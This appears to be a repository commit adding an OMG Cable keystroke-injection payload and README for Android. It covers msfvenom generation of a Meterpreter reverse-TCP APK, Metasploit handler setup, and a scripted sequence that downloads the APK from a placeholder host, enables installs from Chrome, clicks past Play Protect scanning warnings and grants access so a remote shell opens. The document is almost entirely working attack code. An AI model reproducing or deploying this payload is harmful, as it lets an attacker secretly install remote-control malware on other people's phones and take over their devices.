hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Android Meterpreter

pull/11/head
int0x80 2022-01-13 21:09:38 -06:00
parent a5d9471c59
commit 224587b4a5
2 changed files with 169 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
payloads/library/mobile/android/meterpreter/README.md Normal file
View File

@ -0,0 +1,39 @@
# Android Meterpreter
An OMG Cable payload which downloads and installs an APK onto an Android device. Here are the high-level notes.
I would like to see operating systems prompt for authentication when performing risky behaviors, such as installing a new app.
## Generate Payload
Regular `msfvenom` payload generation.
```D
$ msfvenom -p android/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=5555 -o /data/omg.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 79592 bytes
Saved as: /data/omg.apk
```
## Handler
These instructions can also be saved and loaded as an `rc` file via `msfconsole -r`.
```
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > set lport 5555
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > run
```
## Miscellaneous
Some apparent artifacts remain. This is an abbreviated list.
* Notification shows apk was downloaded
* APK remains installed as MainActivity
* `app_uninstall com.metasploit.stage` does not remove the apk

130
payloads/library/mobile/android/meterpreter/payload.txt Normal file
View File

@ -0,0 +1,130 @@
REM # -----------------------------------------------------------
REM # Title: OMG Android Meterpreter
REM # Description: Download and install an APK on Android
REM # Author: int0x80
REM # Target: Android 11
REM # Notes: Set URL for APK payload below
REM # -----------------------------------------------------------
REM # -----------------------------------------------------------
REM # Launch browser to APK destination
REM # -----------------------------------------------------------
GUI b
DELAY 1000
CTRL l
DELAY 50
STRING https://x.x.x.x/your-app.apk
DELAY 50
ENTER
DELAY 2000
REM # -----------------------------------------------------------
REM # Move focus to 'Open' link
REM # -----------------------------------------------------------
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
RIGHT
DELAY 50
ENTER
DELAY 500
REM # -----------------------------------------------------------
REM # Select Chrome as approved source to install apps
REM # -----------------------------------------------------------
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
REM # -----------------------------------------------------------
REM # Finish approved source
REM # GUI DELETE might work here
REM # -----------------------------------------------------------
GUI TAB
DELAY 50
ENTER
DELAY 50
REM # -----------------------------------------------------------
REM # Scanning and Play Store warnings
REM # Install, Install Anyway, Don't send for scanning, Open
REM # -----------------------------------------------------------
RIGHT
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 50
ENTER
DELAY 250
REM # -----------------------------------------------------------
REM # Accept access settings and Continue
REM # -----------------------------------------------------------
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
TAB
DELAY 50
ENTER
DELAY 250
REM # -----------------------------------------------------------
REM # Get shell and obligatory calc
REM # -----------------------------------------------------------
ENTER
DELAY 250
GUI a